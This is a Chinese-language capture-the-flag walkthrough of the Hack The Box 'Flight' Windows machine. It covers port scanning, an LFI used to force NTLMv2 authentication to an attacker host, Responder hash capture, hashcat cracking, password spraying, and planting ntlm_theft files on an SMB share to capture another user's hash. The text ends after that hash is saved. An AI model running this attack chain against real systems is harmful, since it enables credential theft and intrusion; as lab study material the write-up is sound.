Flight-htb-writeup

0x00 靶场技能介绍

章节技能:NTLMv2、LFI、SMB枚举、子域名扫描、impacket-lookupsid、密码喷洒、ntlm_theft、RunasCs.exe、chisel.exe、GodPotato、DCSync

参考链接:https://ch3ng625.github.io/flight

参考链接:https://0xdf.gitlab.io/2023/05/06/htb-flight.html

0x01 用户权限获取

1、靶机介绍:

Flight 是一台硬 Windows 机器,从具有两个不同虚拟主机的网站开始。其中之一容易受到 LFI 的攻击,并允许攻击者检索 NTLM 哈希。一旦破解,获得的明文密码将被喷洒到有效用户名列表中,以发现密码重用场景。一旦攻击者以“s.moon”用户身份获得 SMB 访问权限,他就能够写入其他用户访问的共享。某些文件可用于窃取访问共享的用户的 NTLMv2 哈希值。一旦第二个哈希值被破解,攻击者将能够在托管 Web 文件的共享中编写反向 shell,并以低特权用户身份在机器上获得 shell。有了用户“c.bum”的凭据,就有可能获得该用户的 shell,这将允许攻击者在网站上编写“aspx” Web shell配置为仅在本地主机上侦听。一旦攻击者以 Microsoft 虚拟帐户的身份执行命令,他就能够运行 Rubeus 来获取机器帐户的票证,该票证可用于执行 DCSync 攻击,最终获得管理员用户的哈希值。

2、获取下靶机IP地址:10.10.11.187

3、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-14 17:49 CST
Nmap scan report for 10.10.11.187
Host is up (0.13s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49732/tcp open unknown
49775/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 14.15 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49675,49676,49732,49775,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49675,49676,49732,49775 -sC -sV --min-rate=10000 10.10.11.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-14 17:50 CST
Nmap scan report for 10.10.11.187
Host is up (0.11s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: g0 Aviation
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-14 08:47:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49732/tcp open msrpc Microsoft Windows RPC
49775/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-05-14T08:48:15
|_ start_date: N/A
|_clock-skew: -1h03m11s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.54 seconds

4、绑定下域名地址

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.187 flight.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.187 flight.htb

5、查看下网站首页内容

http://flight.htb/

6、是一个飞机网站,但是没有可以利用的地址,继续枚举虚拟主机子域名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://flight.htb -H 'Host: FUZZ.flight.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fs 7069

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://flight.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.flight.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 7069
________________________________________________

school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 109ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

7、发现子域名地址,绑定本地hosts地址

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.187 school.flight.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.187 school.flight.htb

8、开始访问查看子域名地址信息

http://school.flight.htb/

http://school.flight.htb/index.php?view=home.html

9、经过分析发现该地址可以本地文件读取,这里尝试进行HTLMv2捕获

http://school.flight.htb/index.php?view=../

http://school.flight.htb/index.php?view=//10.10.14.45/share

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0 -w -d
[sudo] kali 的密码:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.45]
Responder IPv6 [dead:beef:2::102b]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-5ED07XFK2C8]
Responder Domain Name [NQHC.LOCAL]
Responder DCE-RPC Port [47940]

[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:e6f36cc6c0fc62b8:B98BAFA62D7E0637E3ABA172B90AF184:01010000000000008062565729A6DA01A5FA644C4EE0CB0100000000020008004E0051004800430001001E00570049004E002D0035004500440030003700580046004B0032004300380004003400570049004E002D0035004500440030003700580046004B003200430038002E004E005100480043002E004C004F00430041004C00030014004E005100480043002E004C004F00430041004C00050014004E005100480043002E004C004F00430041004C00070008008062565729A6DA0106000400020000000800300030000000000000000000000000300000CE8AB8D7C7DA8D70AC7E8F596E82DB9E308C37379BD94EAB01F02E0BCF9FCA900A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340035000000000000000000

10、成功抓取到哈希值,下面开始破解密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat hash
svc_apache::flight:e6f36cc6c0fc62b8:B98BAFA62D7E0637E3ABA172B90AF184:01010000000000008062565729A6DA01A5FA644C4EE0CB0100000000020008004E0051004800430001001E00570049004E002D0035004500440030003700580046004B0032004300380004003400570049004E002D0035004500440030003700580046004B003200430038002E004E005100480043002E004C004F00430041004C00030014004E005100480043002E004C004F00430041004C00050014004E005100480043002E004C004F00430041004C00070008008062565729A6DA0106000400020000000800300030000000000000000000000000300000CE8AB8D7C7DA8D70AC7E8F596E82DB9E308C37379BD94EAB01F02E0BCF9FCA900A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340035000000000000000000

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "NTLMv2"
5600 | NetNTLMv2 | Network Protocol
27100 | NetNTLMv2 (NT) | Network Protocol

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 5600 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

SVC_APACHE::flight:e6f36cc6c0fc62b8:b98bafa62d7e0637e3aba172b90af184:01010000000000008062565729a6da01a5fa644c4ee0cb0100000000020008004e0051004800430001001e00570049004e002d0035004500440030003700580046004b0032004300380004003400570049004e002d0035004500440030003700580046004b003200430038002e004e005100480043002e004c004f00430041004c00030014004e005100480043002e004c004f00430041004c00050014004e005100480043002e004c004f00430041004c00070008008062565729a6da0106000400020000000800300030000000000000000000000000300000ce8ab8d7c7da8d70ac7e8f596e82db9e308c37379bd94eab01f02e0bcf9fca900a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340035000000000000000000:S@Ss!K@*t13

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SVC_APACHE::flight:e6f36cc6c0fc62b8:b98bafa62d7e063...000000
Time.Started.....: Tue May 14 18:11:26 2024 (5 secs)
Time.Estimated...: Tue May 14 18:11:31 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2077.0 kH/s (0.42ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10663936/14344385 (74.34%)
Rejected.........: 0/10663936 (0.00%)
Restore.Point....: 10662912/14344385 (74.34%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: S@ltw@ter -> S4L1n45
Hardware.Mon.#1..: Util: 81%

Started: Tue May 14 18:11:26 2024
Stopped: Tue May 14 18:11:33 2024

11、经过尝试,发现该密码只能登录SMB服务

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13'
SMB 10.10.11.187 5985 G0 [*] Windows 10.0 Build 17763 (name:G0) (domain:flight.htb)
HTTP 10.10.11.187 5985 G0 [*] http://10.10.11.187:5985/wsman
WINRM 10.10.11.187 5985 G0 [-] flight.htb\svc_apache:S@Ss!K@*t13

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13'
SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13

12、接下来就是枚举SMB服务,看看有啥收获没有

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' --shares
SMB flight.htb 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB flight.htb 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB flight.htb 445 G0 [+] Enumerated shares
SMB flight.htb 445 G0 Share Permissions Remark
SMB flight.htb 445 G0 ----- ----------- ------
SMB flight.htb 445 G0 ADMIN$ Remote Admin
SMB flight.htb 445 G0 C$ Default share
SMB flight.htb 445 G0 IPC$ READ Remote IPC
SMB flight.htb 445 G0 NETLOGON READ Logon server share
SMB flight.htb 445 G0 Shared READ
SMB flight.htb 445 G0 SYSVOL READ Logon server share
SMB flight.htb 445 G0 Users READ
SMB flight.htb 445 G0 Web READ

13、这里其实可以结合SMB服务使用impacket-lookupsid工具进行获取目标靶机的用户ID

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-lookupsid 'svc_apache:S@Ss!K@*t13@flight.htb' | grep SidTypeUser | cut -d' ' -f 2 | cut -d'\' -f 2 | tee users
Administrator
Guest
krbtgt
G0$
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
svc_apache
O.Possum

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb | grep SidTypeUser | cut -d' ' -f 2 | cut -d'\' -f 2 | tee users
Administrator
Guest
krbtgt
G0$
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
svc_apache
O.Possum

14、接下来尝试看看是否存在密码复用的情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb flight.htb -u users -p 'S@Ss!K@*t13' --continue-on-success
SMB flight.htb 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB flight.htb 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\G0$:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB flight.htb 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB flight.htb 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE

15、存在1个,那继续使用该账号进行查看是否有SMB的其他目录权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb flight.htb -u S.Moon -p 'S@Ss!K@*t13' --shares
SMB flight.htb 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB flight.htb 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB flight.htb 445 G0 [+] Enumerated shares
SMB flight.htb 445 G0 Share Permissions Remark
SMB flight.htb 445 G0 ----- ----------- ------
SMB flight.htb 445 G0 ADMIN$ Remote Admin
SMB flight.htb 445 G0 C$ Default share
SMB flight.htb 445 G0 IPC$ READ Remote IPC
SMB flight.htb 445 G0 NETLOGON READ Logon server share
SMB flight.htb 445 G0 Shared READ,WRITE
SMB flight.htb 445 G0 SYSVOL READ Logon server share
SMB flight.htb 445 G0 Users READ
SMB flight.htb 445 G0 Web READ
1
2
3
4
5
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm flight.htb -u S.Moon -p 'S@Ss!K@*t13'
SMB flight.htb 5985 G0 [*] Windows 10.0 Build 17763 (name:G0) (domain:flight.htb)
HTTP flight.htb 5985 G0 [*] http://flight.htb:5985/wsman
WINRM flight.htb 5985 G0 [-] flight.htb\S.Moon:S@Ss!K@*t13

16、发现对某个目录有写入权限,但是没有winrm权限,这里存在一个情况,SMBMap工具识别的用户权限不准确,实际当前用户可以有写入权限的,其次当前账户没有winrm权限,无法进行远程登录。

但是,当我尝试上传文本文件时,它返回“访问被拒绝”。此处允许上传的文件类型可能有一些限制。

通过对名为 的空共享的写访问权限Shared,我可以删除一些文件,这些文件可能会吸引任何合法的访问用户尝试对我的主机进行身份验证。这篇文章列出了一些可以完成此操作的方法。ntlm_theft是一个很好的工具,可以创建一堆这样的文件。

NTLM 强制身份验证 — 第 2 轮:

根据共享的名称,我猜测有其他用户访问该共享并可能打开其中的文件。有一种针对 SMB 的经典攻击,涉及在引用攻击者控制的主机的共享中删除 SCF(Shell 命令文件)文件。当用户打开文件时,它将连接到远程共享并尝试对其进行身份验证。这篇文章提供了此类攻击的一个简单示例。

我将再次启动服务器,并使用ntlm_theft生成一堆不同文件类型的有效负载。由于存在文件类型过滤,我们可能需要尝试多个有效负载。responder

17、下面开始尝试使用该工具进行生成文件

https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

https://github.com/Greenwolf/ntlm_theft

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿offsec)-[~/Desktop/ntlm_theft]
└─$ python3 ntlm_theft.py --generate all --server 10.10.14.45 --filename exploit
Created: exploit/exploit.scf (BROWSE TO FOLDER)
Created: exploit/exploit-(url).url (BROWSE TO FOLDER)
Created: exploit/exploit-(icon).url (BROWSE TO FOLDER)
Created: exploit/exploit.lnk (BROWSE TO FOLDER)
Created: exploit/exploit.rtf (OPEN)
Created: exploit/exploit-(stylesheet).xml (OPEN)
Created: exploit/exploit-(fulldocx).xml (OPEN)
Created: exploit/exploit.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: exploit/exploit-(includepicture).docx (OPEN)
Created: exploit/exploit-(remotetemplate).docx (OPEN)
Created: exploit/exploit-(frameset).docx (OPEN)
Created: exploit/exploit-(externalcell).xlsx (OPEN)
Created: exploit/exploit.wax (OPEN)
Created: exploit/exploit.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: exploit/exploit.asx (OPEN)
Created: exploit/exploit.jnlp (OPEN)
Created: exploit/exploit.application (DOWNLOAD AND OPEN)
Created: exploit/exploit.pdf (OPEN AND ALLOW)
Created: exploit/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: exploit/Autorun.inf (BROWSE TO FOLDER)
Created: exploit/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

18、我将首先上传该文件,因为它是最著名的文件。这些文件通常用于创建自定义快捷方式,下面的有效负载将图标文件指定为指向我的主机的 UNC 路径。如果打开,它将连接到我的主机,并且能够捕获 NTLM 哈希。.scfresponder,批量通过smbclient工具进行上传文件到共享目录中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿offsec)-[~/Desktop/ntlm_theft]
└─$ cd exploit

┌──(kali㉿offsec)-[~/Desktop/ntlm_theft/exploit]
└─$ smbclient //flight.htb/shared -U S.Moon 'S@Ss!K@*t13'
Password for [WORKGROUP\S.Moon]:
Try "help" to get a list of possible commands.
smb: \> prompt false
smb: \> mput *
NT_STATUS_ACCESS_DENIED opening remote file \exploit-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \exploit-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
NT_STATUS_ACCESS_DENIED opening remote file \exploit-(frameset).docx
NT_STATUS_ACCESS_DENIED opening remote file \exploit.pdf
NT_STATUS_ACCESS_DENIED opening remote file \exploit-(remotetemplate).docx
NT_STATUS_ACCESS_DENIED opening remote file \exploit.asx
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \exploit.lnk
NT_STATUS_ACCESS_DENIED opening remote file \exploit.m3u
putting file exploit-(fulldocx).xml as \exploit-(fulldocx).xml (110.1 kb/s) (average 110.1 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \exploit-(icon).url
putting file exploit.application as \exploit.application (5.4 kb/s) (average 76.8 kb/s)
putting file exploit.jnlp as \exploit.jnlp (0.6 kb/s) (average 58.4 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \exploit.rtf
putting file exploit-(stylesheet).xml as \exploit-(stylesheet).xml (0.5 kb/s) (average 47.0 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \exploit.wax
NT_STATUS_ACCESS_DENIED opening remote file \exploit.scf
putting file desktop.ini as \desktop.ini (0.2 kb/s) (average 39.5 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \exploit.htm
NT_STATUS_ACCESS_DENIED opening remote file \exploit-(externalcell).xlsx
smb: \> ls
. D 0 Tue May 14 17:58:05 2024
.. D 0 Tue May 14 17:58:05 2024
desktop.ini A 47 Tue May 14 17:58:05 2024
exploit-(fulldocx).xml A 72585 Tue May 14 17:58:04 2024
exploit-(stylesheet).xml A 163 Tue May 14 17:58:05 2024
exploit.application A 1650 Tue May 14 17:58:04 2024
exploit.jnlp A 192 Tue May 14 17:58:04 2024

5056511 blocks of size 4096. 1203702 blocks available
smb: \> exit

19、有趣的是,有一堆被阻止了。但也有少数人做到了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0 -w -d
[sudo] kali 的密码:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.45]
Responder IPv6 [dead:beef:2::102b]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-VXLCIKO9YD4]
Responder Domain Name [11XY.LOCAL]
Responder DCE-RPC Port [49531]

[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:2d7de2d26f8b01e0:E362AA83A6C40E25EDA75F05F22C43B0:010100000000000000C7D83930A6DA01356F4ED08132EDB60000000002000800310031005800590001001E00570049004E002D00560058004C00430049004B004F00390059004400340004003400570049004E002D00560058004C00430049004B004F0039005900440034002E0031003100580059002E004C004F00430041004C000300140031003100580059002E004C004F00430041004C000500140031003100580059002E004C004F00430041004C000700080000C7D83930A6DA0106000400020000000800300030000000000000000000000000300000CE8AB8D7C7DA8D70AC7E8F596E82DB9E308C37379BD94EAB01F02E0BCF9FCA900A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340035000000000000000000

20、经过别人访问,我们也获取到目标者的哈希,下面开始破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
┌──(kali㉿offsec)-[~/Desktop]
└─$ touch hash1

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat hash1
c.bum::flight.htb:2d7de2d26f8b01e0:E362AA83A6C40E25EDA75F05F22C43B0:010100000000000000C7D83930A6DA01356F4ED08132EDB60000000002000800310031005800590001001E00570049004E002D00560058004C00430049004B004F00390059004400340004003400570049004E002D00560058004C00430049004B004F0039005900440034002E0031003100580059002E004C004F00430041004C000300140031003100580059002E004C004F00430041004C000500140031003100580059002E004C004F00430041004C000700080000C7D83930A6DA0106000400020000000800300030000000000000000000000000300000CE8AB8D7C7DA8D70AC7E8F596E82DB9E308C37379BD94EAB01F02E0BCF9FCA900A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340035000000000000000000

┌──(kali㉿offsec)-[~/Desktop]
